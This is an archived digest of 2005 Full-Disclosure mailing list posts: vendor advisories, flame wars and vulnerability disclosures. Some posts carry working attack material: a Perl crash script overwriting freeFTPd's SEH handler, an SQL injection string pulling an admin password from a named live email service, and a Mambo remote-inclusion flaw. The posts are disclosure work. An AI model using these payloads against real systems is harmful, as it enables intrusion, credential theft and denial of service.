
re: [Full-disclosure] freeftpd USER bufferoverflow

[KF (lists)]

The default configuration is not vulnerable unless the Logging option 
"Log events" is checked.


-KF

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Database servers on XP and the curious flaw

[David Litchfield]

Hi Eliah,


David Litchfield wrote:

Hey all,
I've just put up a paper on a curious flaw that appears when running a



My intent is not to MS-bash here, but perhaps Microsoft is to blame
for not educating people about this issue. (If they had, your paper
would be superfluous.)



Usually if millions of users are insecure because they don't know
something, someone is to blame.


To be honest I don't think we're talking millions of people. How many people 
at home run a fully fledged RDBMS on their XP systems? Very few I'd guess. 
Besides, Simple File Sharing is documented so MS are educating those willing 
to seek information.


Cheers,
David
http://www.databasesecurity.com/
http://www.ngssoftware.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Database servers on XP and the curious flaw

[Eliah Kagan]

David Litchfield wrote:
> Hey all,
> I've just put up a paper on a curious flaw that appears when running a
> database server on Windows XP with Simple File Sharing enabled. The flaw
> essentially allows a remote attacker to gain access to the database,
> sometimes with DBA privileges, without knowledge of a valid password. To be
> honest, no-one is really to blame; it's just one of those cases where you
> take two disparate mechanisms, shake them up, add a dash of lime and serve
> up. The paper can be found here
> http://www.databasesecurity.com/dbsec-papers.htm and is entitled "Database
> Servers on Windows XP and the Unintended Consequences of Simple File
> Sharing". It doubles-up as my entry for the "Longest Title" award.
> Cheers,
> David Litchfield
> http://www.databasesecurity.com/
> http://www.ngssoftware.com/

My intent is not to MS-bash here, but perhaps Microsoft is to blame
for not educating people about this issue. (If they had, your paper
would be superfluous.)

Usually if millions of users are insecure because they don't know
something, someone is to blame.

-Eliah
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CMP Media Acquires Black Hat

[Davide Del Vecchio]

http://www.prnewswire.com/cgi-bin/stories.pl?ACCT=104&STORY=/www/story/11-15 
-2005/0004216861&EDATE= 


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Davide Del Vecchio "Dante Alighieri" [EMAIL PROTECTED] [EMAIL PROTECTED]
http://www.alighieri.org http://www.ezln.it
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Was: n3td3v.com, SHUT THE FUCK UP!

[n3td3v n3td3v]

Trolling is a two-way street.
There is the troll and people that can't help but get a word in.
All of these threads would have gone away long ago if everyone just ignored it.
By the way, social engineering is a big part of security.On 11/16/05, [EMAIL PROTECTED] <
[EMAIL PROTECTED]> wrote:













Damn shut the fuck up all bunch of kiddies
searching friends and leave FD for what it is , SECURITY!

 









De :

[EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]] 
De la part de poo
Envoyé : mercredi 16 novembre
2005 10:05
À :
full-disclosure@lists.grok.org.uk
Objet : Re: [Full-disclosure]
Was: n3td3v.com, now: C.Meinel



 

throw the filthy wench
off the starboard bow yaaar



On 11/16/05, InfoSecBOFH
<[EMAIL PROTECTED]> wrote:


On 11/15/05, Byron Sonne <[EMAIL PROTECTED]
>
wrote:
>  > Carolyn Meinel wrote: 
>
> I'd be wary of anything Ms. Meinel has to say:
> http://attrition.org/errata/charlatan/shame/index2.html
>
> The info's old but some leopards don't change their spots. 

and some never deserved their spots in the first place...
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/






-- 
smile tomorrow will be worse 







___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Kiddiots Today

[n3td3v n3td3v]

Thats right I am the ass that keep prodding to continue posting.
The point being you just keep provoking more by not letting it go.On 11/15/05, Aditya Deshmukh <
[EMAIL PROTECTED]> wrote:




and 
you replied to it again.

  
  
  From: 
  [EMAIL PROTECTED] 
  [mailto:[EMAIL PROTECTED]] On Behalf Of n3td3v 
  n3td3vSent: Tuesday, November 15, 2005 10:27 PMTo: J. 
  OquendoCc: full-disclosure@lists.grok.org.ukSubject: Re: 
  [Full-disclosure] Kiddiots Today
  And yet you took the time to add to it.
  On 11/15/05, J. 
  Oquendo <[EMAIL PROTECTED]> wrote:
  On 
Tue, 15 Nov 2005, n3td3v n3td3v wrote:>> Or am I the real 
n3td3v just throwing up smokescreens, who knows?>No one cares 
much for this moronic thread nor whether or not someone isthrowing up 
smokescreens. Can some of you guys grow up or at least grow aclue and 
speak about something worthwhile. This list can the tendency tobring 
brainrot.=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. 
OquendoGPG Key ID 0x97B43D89http://mo.fscker.com :: Obscurity through 
Insecurity"I know what I have given you. I do not know whatyou 
have received" -- Antonio Porchia 


Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Cisco Security Advisory: Fixed SNMP Communities and Open UDP Port in Cisco 7920 Wireless IP Phone

[Cisco Systems Product Security Incident Response Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Fixed SNMP Communities and Open UDP Port in Cisco 7920
Wireless IP Phone

Document ID: 68179

Advisory ID: cisco-sa-20051116-7920

http://www.cisco.com/warp/public/707/cisco-sa-20051116-7920.shtml

Revision 1.0

For Public Release 2005 November 16 1600 UTC (GMT)

- ---

Contents


Summary
Affected Products
Details
Impact
Software Versions and Fixes
Workarounds
Obtaining Fixed Software
Exploitation and Public Announcements
Status of This Notice: FINAL
Distribution
Revision History
Cisco Security Procedures

- ---

Summary
===

The Cisco 7920 Wireless IP Phone provides Voice Over IP service via IEEE
802.11b Wi-Fi networks and has a form-factor similar to a cordless phone. This
product contains two vulnerabilities:

The first vulnerability is an SNMP service with fixed community strings that
allow remote users to read, write, and erase the configuration of an affected
device.

The second vulnerability is an open VxWorks Remote Debugger on UDP port 17185
that may allow an unauthenticated remote user to access debugging information
or cause a denial of service.

Cisco has made free software available to address these vulnerabilities for
affected customers. There are workarounds available to mitigate the effects of
the vulnerability.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20051116-7920.shtml.

Affected Products
=

Vulnerable Products
+--

  * Cisco 7920 Wireless IP Phone, firmware version 2.0 and earlier

Products Confirmed Not Vulnerable
+

  * Cisco 7920 Wireless IP Phone, firmware version 2.01

No other Cisco products are currently known to be affected by these
vulnerabilities, including other IP telephony products.

Details
===

Fixed SNMP Community Strings
+---

The Cisco 7920 Wireless IP Phone provides an SNMP service with fixed read-only
and read-write community strings of "public" and "private", respectively. These
strings cannot be changed by the user and will allow remote users to issue an
SNMP GetRequest or SetRequest to the phone. SNMP can be used to retrieve and
modify the device configuration, including stored user data such as phone book
entries. To address this vulnerability, Cisco has provided updated software
that removes the SNMP functionality from this product.

This issue is documented in Cisco bug ID CSCsb75186 ( registered customers
only) .

VxWorks Debugger Port (wdbrpc, 17185/udp)
+

The Cisco 7920 Wireless IP Phone listens on UDP port 17185 to allow connections
from a VxWorks debugger. This port may allow remote users to collect debugging
information or conduct a denial of service attack against an affected device.
To address this vulnerability, Cisco has provided updated software that closes
UDP port 17185.

This issue is documented in Cisco bug ID CSCsb38210 ( registered customers
only) .

Impact
==

Successful exploitation of these vulnerabilities may result in information
leakage or denial of service attacks against an affected device. In the case of
the Fixed SNMP Community Strings vulnerability, an attack may take the form of
erasure or modification of the device configuration and personal user data.

Software Versions and Fixes
===

Cisco has provided free software to address these vulnerabilities; please
consult the chart below for details.

When considering software upgrades, also consult http://www.cisco.com/go/psirt
and any subsequent advisories to determine exposure and a complete upgrade
solution.

In all cases, customers should exercise caution to be certain the devices to be
upgraded contain sufficient memory and that current hardware and software
configurations will continue to be supported properly by the new release. If
the information is not clear, contact the Cisco Technical Assistance Center
("TAC") or your contracted maintenance provider for assistance.

+-+
|| Affected  |   First|
|Cisco Bug ID| Firmware  |   Fixed|
|| Releases  |  Firmware  |
||   |  Release   |
|+---+|
| CSCsb75186 (   | Release   ||
| registered | 1.0(8)| Release|
| customers only)| and   | 1.0(9) |
| (SNMP) | earlier   ||
|+---+|
| CSCsb38210 (   | Release   ||
| registered | 2.0 and   | Release|
| customers only)| earli

[Full-disclosure] mambo remote code sexecution

[peter MC tachatte]

a vulnerability exist in globals.php when register_globals is off and allow remote code inclusion
 
this a GLOBALS overwrite
 
in components/com_content/content.html.phpthere is the line:require_once( $GLOBALS['mosConfig_absolute_path'] . '/includes/HTML_toolbar.php' );okda globals.php:if (!ini_get('register_globals')) {
while(list($key,$value)=each($_FILES)) $GLOBALS[$key]=$value;while(list($key,$value)=each($_ENV)) $GLOBALS[$key]=$value;while(list($key,$value)=each($_GET)) $GLOBALS[$key]=$value;while(list($key,$value)=each($_POST)) $GLOBALS[$key]=$value;
while(list($key,$value)=each($_COOKIE)) $GLOBALS[$key]=$value;while(list($key,$value)=each($_SERVER)) $GLOBALS[$key]=$value;while(list($key,$value)[EMAIL PROTECTED]($_SESSION)) $GLOBALS[$key]=$value;foreach($_FILES as $key => $value){
$GLOBALS[$key]=$_FILES[$key]['tmp_name'];foreach($value as $ext => $value2){$key2 = $key . '_' . $ext;$GLOBALS[$key2] = $value2;}}}da fake protect in mambo.php:if (in_array( 'globals', array_keys( array_change_key_case( $_REQUEST, CASE_LOWER ) ) ) ) {
die( 'Fatal error. Global variable hack attempted.' );}if (in_array( '_post', array_keys( array_change_key_case( $_REQUEST, CASE_LOWER ) ) ) ) {die( 'Fatal error. Post variable hack attempted.' );}
 
poc: http://enviede.wistee-heb.fr/index.php?cat=poc
 
[EMAIL PROTECTED]
 
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ GLSA 200511-14 ] GTK+ 2, GdkPixbuf: Multiple XPM decoding vulnerabilities

[Thierry Carrez]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200511-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: GTK+ 2, GdkPixbuf: Multiple XPM decoding vulnerabilities
  Date: November 16, 2005
  Bugs: #112608
ID: 200511-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


The GdkPixbuf library, that is also included in GTK+ 2, contains
vulnerabilities that could lead to a Denial of Service or the
execution of arbitrary code.

Background
==

GTK+ (the GIMP Toolkit) is a toolkit for creating graphical user
interfaces. The GdkPixbuf library provides facilities for image
handling. It is available as a standalone library and also packaged
with GTK+ 2.

Affected packages
=

---
 Package/   Vulnerable   /  Unaffected
---
  1  x11-libs/gtk+  < 2.8.6-r1 >= 2.8.6-r1
 *>= 2.6.10-r1
 < 2.0
  2  media-libs/gdk-pixbuf  < 0.22.0-r5   >= 0.22.0-r5
---
 2 affected packages on all of their supported architectures.
---

Description
===

iDEFENSE reported a possible heap overflow in the XPM loader
(CVE-2005-3186). Upon further inspection, Ludwig Nussel discovered two
additional issues in the XPM processing functions : an integer overflow
(CVE-2005-2976) that affects only gdk-pixbuf, and an infinite loop
(CVE-2005-2975).

Impact
==

Using a specially crafted XPM image an attacker could cause an affected
application to enter an infinite loop or trigger the overflows,
potentially allowing the execution of arbitrary code.

Workaround
==

There is no known workaround at this time.

Resolution
==

All GTK+ 2 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose x11-libs/gtk+

All GdkPixbuf users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/gdk-pixbuf-0.22.0-r5"

References
==

  [ 1 ] CVE-2005-2975
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2975
  [ 2 ] CVE-2005-2976
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2976
  [ 3 ] CVE-2005-3186
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3186
  [ 4 ] iDefense Security Advisory 11.15.05

http://www.idefense.com/application/poi/display?id=339&type=vulnerabilities

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200511-14.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0



signature.asc
Description: OpenPGP digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Database servers on XP and the curious flaw

[David Litchfield]

Hey all,
I've just put up a paper on a curious flaw that appears when running a
database server on Windows XP with Simple File Sharing enabled. The flaw
essentially allows a remote attacker to gain access to the database,
sometimes with DBA privileges, without knowledge of a valid password. To be
honest, no-one is really to blame; it's just one of those cases where you
take two disparate mechanisms, shake them up, add a dash of lime and serve
up. The paper can be found here
http://www.databasesecurity.com/dbsec-papers.htm and is entitled "Database
Servers on Windows XP and the Unintended Consequences of Simple File
Sharing". It doubles-up as my entry for the "Longest Title" award.
Cheers,
David Litchfield
http://www.databasesecurity.com/
http://www.ngssoftware.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Three years and ten months without a patch

[Marco Ermini]

On 11/16/05, Barrie Dempster <[EMAIL PROTECTED]> wrote:
[...]
> Are we forgetting slammer ? A worm that attacked a product which you
> would expect to be used in a similar way.
>
> Backend or not, the system should be patched, being backend is not a
> justifiable reason for not patching the system.
[...]
> Believing this would be a very narrow view of security and we
> all know security is far from something to be viewed like that.
[...]

You are totally right. In fact I was (or better - I *tried* to be...)
ironical about it... that's their philosophy: on 8.1.x you are 4
versions behind their actual off-the-shelf product - which, as we
said, "never breaks" so, of course, why not upgrade?... (and pay the
licensing fees)


Cheers
--
Marco Ermini
Dubium sapientiae initium. (Descartes)
[EMAIL PROTECTED] # mount -t life -o ro /dev/dna /genetic/research
(This message is for the designated recipient only and may contain
privileged or confidential information. If you have received it in
error, please notify the sender immediately and delete the original.)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Three years and ten months without a patch

[Barrie Dempster]

On Wed, 2005-11-16 at 10:19 +0100, Marco Ermini wrote:
> On 11/15/05, InfoSecBOFH <[EMAIL PROTECTED]> wrote:
> > So why not start teaching some lessons David and release exploit code.
> >  It seems that is the only way they learn and take thing seriously.
> 
> Rarely this software did not run in a what is considered "secured"
> environment - I mean, this is rarely exposed on Internet/DMZs. Usually
> Oracle DB (especially these older versions which didn't have so much
> web application software) are used just as database back end, which
> communicates with DMZs through multiple firewall levels (I am not
> justifying them in any way, I am just guessing why they may not care
> so much). Security is considered often not important - especially if
> you can "inexpensively" upgrade to a 9.x or 10.x or 11.x software
> version which "never breaks"...

Are we forgetting slammer ? A worm that attacked a product which you
would expect to be used in a similar way.

Backend or not, the system should be patched, being backend is not a
justifiable reason for not patching the system. Ignoring the fact that
these systems are commonly open to the net you also ignore, injection of
commands from a front end web server being carried backwards and what
about the local user ?

I work in a few environments where a DBA should not be allowed access to
the OS at any point other than to query the DB. A vulnerability such as
this in the software in use would have serious consequences in that
situation. Believing this would be a very narrow view of security and we
all know security is far from something to be viewed like that.

-- 
With Regards..
Barrie Dempster (zeedo) - Fortiter et Strenue

"He who hingeth aboot, geteth hee-haw" Victor - Still Game

blog:  http://reboot-robot.net
sites: http://www.bsrf.org.uk - http://www.security-forums.com
ca:https://www.cacert.org/index.php?id=3


smime.p7s
Description: S/MIME cryptographic signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] 30gigs SQL injection vulnerability

[cumhur onat]

I found a sql injection vulnerability, which leads to password disclosure in 30gigs.com email service.
The vulnerability exists in http://www.30gigs.com/getpassword/ page due to lack of validation of user submitted data.
Proof of Concept:
enter http://www.30gigs.com/getpassword/
and copy & paster this code in the Login field, finally submit the form.

not_existant' union select 1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where userLogin='admin

it will give an output like below, in which "runsit" corresponds to the password of account "admin"
We have sent the password for your not_existant' union select
1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where
userLogin='[EMAIL PROTECTED] account to runsit

The site has been notified about the vulnerability 2 weeks ago, but no response was taken.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] another filename bypass vulnerability - from cmd.exe

[6ackpace]

It also work for windowsXp 2 and with other ext .
 
i.e exe.txt.exe.pdf .. 
On 11/16/05, Aditya Deshmukh <[EMAIL PROTECTED]> wrote:

Was doing some testing [xfocus-AD-051115]Ie Multiple antivirus failed to scanmalicous filename bypass vulnerability
The system is windows 2000 sp4 srp5 withall other patches upto date.At the command prompt cmd.exe executethe following with the results.I copy and paste from cmd.exe---
E:\TEMP>cd testE:\TEMP\test>copy %windir%\system32\calc.exe   1 file(s) copied.E:\TEMP\test>ren calc.exe calc.exe.zipE:\TEMP\test>dir /bcalc.exe.zipE:\TEMP\test>
calc.exe.zipE:\TEMP\test>---This bring up the calc.exe on the screen.
Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] another filename bypass vulnerability - from cmd.exe

[Aditya Deshmukh]

Was doing some testing [xfocus-AD-051115] 

Ie Multiple antivirus failed to scan 
malicous filename bypass vulnerability

The system is windows 2000 sp4 srp5 with 
all other patches upto date.

At the command prompt cmd.exe execute 
the following with the results. 

I copy and paste from cmd.exe 
---

E:\TEMP>cd test

E:\TEMP\test>copy %windir%\system32\calc.exe
1 file(s) copied.

E:\TEMP\test>ren calc.exe calc.exe.zip

E:\TEMP\test>dir /b
calc.exe.zip 

E:\TEMP\test>calc.exe.zip

E:\TEMP\test>
---
This bring up the calc.exe on the screen.







Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [USN-216-1] GDK vulnerabilities

[Martin Pitt]

===
Ubuntu Security Notice USN-216-1  November 16, 2005
gtk+2.0, gdk-pixbuf vulnerabilities
CVE-2005-2975, CVE-2005-2976, CVE-2005-3186
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

gtk2-engines-pixbuf
libgdk-pixbuf2

The problem can be corrected by upgrading the affected package to
the following versions:

Ubuntu 4.10:
  libgdk-pixbuf2: 0.22.0-7ubuntu1.2
  gtk2-engines-pixbuf: 2.6.4-0ubuntu3.1

Ubuntu 5.04:
  libgdk-pixbuf2: 0.22.0-7ubuntu2.1
  gtk2-engines-pixbuf: 2.6.4-0ubuntu3.1

Ubuntu 5.10:
  libgdk-pixbuf2: 0.22.0-8ubuntu0.1
  gtk2-engines-pixbuf: 2.8.6-0ubuntu2.1

After a standard system upgrade you should restart your session to
effect the necessary changes.

Details follow:

Two integer overflows have been discovered in the XPM image loader of
the GDK pixbuf library. By tricking an user into opening a specially
crafted XPM image with any Gnome desktop application that uses this
library, this could be exploited to execute arbitrary code with the
privileges of the user running the application.
(CVE-2005-2976, CVE-2005-3186)

Additionally, specially crafted XPM images could cause an endless loop
in the image loader, which could be exploited to cause applications
trying to open that image to hang. (CVE-2005-2975)


Updated packages for Ubuntu 4.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/gdk-pixbuf_0.22.0-7ubuntu1.2.diff.gz
  Size/MD5:   375968 809e328e7978a1a05c363744b669a40e

http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/gdk-pixbuf_0.22.0-7ubuntu1.2.dsc
  Size/MD5:  723 6c4495f57699b76148a0602927545e20

http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/gdk-pixbuf_0.22.0.orig.tar.gz
  Size/MD5:   519266 4db0503b5a62533db68b03908b981751

http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/gtk+2.0_2.4.10-1ubuntu1.2.diff.gz
  Size/MD5:49509 0ce4ae3ba4a43acaec0e267593c56400

http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/gtk+2.0_2.4.10-1ubuntu1.2.dsc
  Size/MD5: 1936 dde6d8e7ba7c47e843a5dc8c2b680499

http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/gtk+2.0_2.4.10.orig.tar.gz
  Size/MD5: 14140860 b1876ebde3b85bceb576ee5e2ecfd60b

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/libgtk2.0-common_2.4.10-1ubuntu1.2_all.deb
  Size/MD5:  2778618 00f15aa5dba52503adaf47cede461b2c

http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/libgtk2.0-doc_2.4.10-1ubuntu1.2_all.deb
  Size/MD5:  1877958 bd501df1b60309f472ad33ee74200584

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/universe/g/gtk+2.0/gtk2.0-examples_2.4.10-1ubuntu1.2_amd64.deb
  Size/MD5:   262178 27831fe024d2d09ac5f3c9c457ae0032

http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/libgdk-pixbuf-dev_0.22.0-7ubuntu1.2_amd64.deb
  Size/MD5:   155374 c617a31cf7408ff7ccc6dcf544e766a1

http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/libgdk-pixbuf-gnome-dev_0.22.0-7ubuntu1.2_amd64.deb
  Size/MD5: 8520 09e152c4a295c6b3b6e52375e0355e43

http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/libgdk-pixbuf-gnome2_0.22.0-7ubuntu1.2_amd64.deb
  Size/MD5: 7936 baecd3a2aca1cb678e652782da890483

http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/libgdk-pixbuf2_0.22.0-7ubuntu1.2_amd64.deb
  Size/MD5:   183498 080cdd7e1cb08979fc0140a191baf418

http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/libgtk2.0-0_2.4.10-1ubuntu1.2_amd64.deb
  Size/MD5:  2184102 04a8f1b3e01bf5618f5d8b70645be6bb

http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/libgtk2.0-bin_2.4.10-1ubuntu1.2_amd64.deb
  Size/MD5:13932 9ed21c2bb288a11e4ca2436f4757abda

http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/libgtk2.0-dbg_2.4.10-1ubuntu1.2_amd64.deb
  Size/MD5: 10299800 a385ad242f16a96a1ba27b8945255856

http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/libgtk2.0-dev_2.4.10-1ubuntu1.2_amd64.deb
  Size/MD5:  2841762 39311a1c6efc513741b6d38cd1b38f68

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/universe/g/gtk+2.0/gtk2.0-examples_2.4.10-1ubuntu1.2_i386.deb
  Size/MD5:   258802 74c64c0bc8320c3452d63f9c4dfe4579

http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/libgdk-pixbuf-dev_0.22.0-7ubuntu1.2_i386.deb
  Size/MD5:   147244 70d3c463e5158902c8218806cf9bea26

http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/libgdk-pixbuf-gnome-dev_0.22.0-7ubuntu1.2_i386.deb
  Size/MD5: 7646 46d4bf959232f67c91d79fbd65c8dcf6

http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/libgdk-pixbuf-gnome2_0.22.0-7ubuntu1.2_i386.deb
  

Re: [Full-disclosure] Meeting Room Names

[Andreas Sons]

Native.Code wrote:
Something not related to vulnerabilities you guys are requested to 
suggest names for our meeting rooms. We don't want to call them with sad 
names like Room A, Board Room etc. but something interesting.


Our office in Bavaria, Germany, is located in an old house with stucco
under the ceiling, big candelabra in the rooms and the corridor and
similar decorations around. It just looks like they made the 1955 "Sissi"
movie with Romy Schneider in this rooms. So we named the rooms with names
from the Habsburg dynasty, starting with the CEOs office "Pricess Sissi"
(he really disliked it), but the conference room become the "Franz
Ferdinand" room, the austrian prince who became murdered in
Sarajevo which led to World War 1.

Andreas
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] freeftpd USER bufferoverflow

[barabas mutsonline]

Hi,
 
While drooling over my new Adriana Lima wallpaper, my tongue accidentally hit my keyboard and more than 1012 chars were sent to the login screen of my freeftpd server (which i use to backup my Adriana Lima pics). Guess what...the server crashed! Luckily I attach ollydbg to every process I have running and ths is what I found:

 
ECX 50505050 
EIP 77C460CB msvcrt.77C460CBLog data, item 0 Address=77C460CB Message=Access violation when reading [50505050] 
77C460CB   8B01 MOV EAX,DWORD PTR DS:[ECX]
 
well, eip doesnt get overwritten, but SEH does:
 

0012B6CC   414141410012B6D0   424242420012B6D4   424242420012B6D8   43434343  Pointer to next SEH record0012B6DC   47464544  SE handler
EIP 47464544
 Log data, item 0 Address=47464544 Message=Access violation when executing [47464544]
 I leave the exploit coding as an exercise...
 
enjoy
 
sample crash code:
 

#!/usr/bin/perl -w#freeftpd USER buffer overflow#barabas - 2005
use strict;use Net::FTP;my $user="\x41"x1011;$user .="\x44\x45\x46\x47";#overwrite SEH$user .="\x50"x400;
my $ftp = Net::FTP->new("127.0.0.1", Debug => 1);$ftp->login("$user","whatevah");
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Was: n3td3v.com, now: C.Meinel

[Marco Ermini]

On 11/16/05, Byron Sonne <[EMAIL PROTECTED]> wrote:
>  > Carolyn Meinel wrote:
>
> I'd be wary of anything Ms. Meinel has to say:
> http://attrition.org/errata/charlatan/shame/index2.html
>
> The info's old but some leopards don't change their spots.

Please don't ever think to put the discussion on the level of personal
attacks. No one is interested, and it's only in the interests of that
more-or-less-real or supposed-to-be-real spammers. Moreover, I cannot
understand how a more-or-less "clean" or "troubled" personal
background could change the topic itself, or what is the problem if a
person changed her own job or had troubles with FBI or KGB or whatever
- being incriminated or asked to testify sometimes is separated by a
thin line (I don't know about USA police, but I know the Italian one.
They called me to testify on a bankruptcy company because they found
the company's name in my CV using Google, since I worked for them as a
contractor many years before... you can understand how smart they
are). Anyway, this are her problem only - she didn't spammed the
list... this is sufficient to me.

Personally I am always diffident to that supposed first-hour experts,
hacking Linux from 0.91 or BSD from 2.0... these are just morons,
single-minded person unable to think out of the box (sorry if this
could offend someone, it is not my intention).

This is my first and last post on this topic. Please stop it.


Cheers
--
Marco Ermini
Dubium sapientiae initium. (Descartes)
[EMAIL PROTECTED] # mount -t life -o ro /dev/dna /genetic/research
(This message is for the designated recipient only and may contain
privileged or confidential information. If you have received it in
error, please notify the sender immediately and delete the original.)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Re: [xfocus-AD-051115]Multiple antivirus failed to scan malicous filename bypass vulnerability

[Marco Monicelli]

Alert7, you forgot to test the vulnerability on NOD32 antivirus. It's
actually very famous and quite reliable product so I think you should
definitively test it too.

Cheers

Yog-Sotho





   
 "[EMAIL PROTECTED] 
 g"
 <[EMAIL PROTECTED]  To 
 g>full-disclosure@lists.grok.org.uk,  
   bugtraq@securityfocus.com,  
 15/11/2005 06.59  [EMAIL PROTECTED] 
cc 
   
   Subject 
   [xfocus-AD-051115]Multiple  
   antivirus failed to scan malicous   
   filename bypass vulnerability   
   
   
   
   
   
   




[xfocus-AD-051115]Multiple antivirus failed to scan malicous filename
bypass vulnerability

discoverer by [EMAIL PROTECTED]
class: design error
Threat level: medium


Vulnerable anti-virus Engine:

Kaspersky Antivirus
Symantec AntiVirus
F-Prot Antivirus
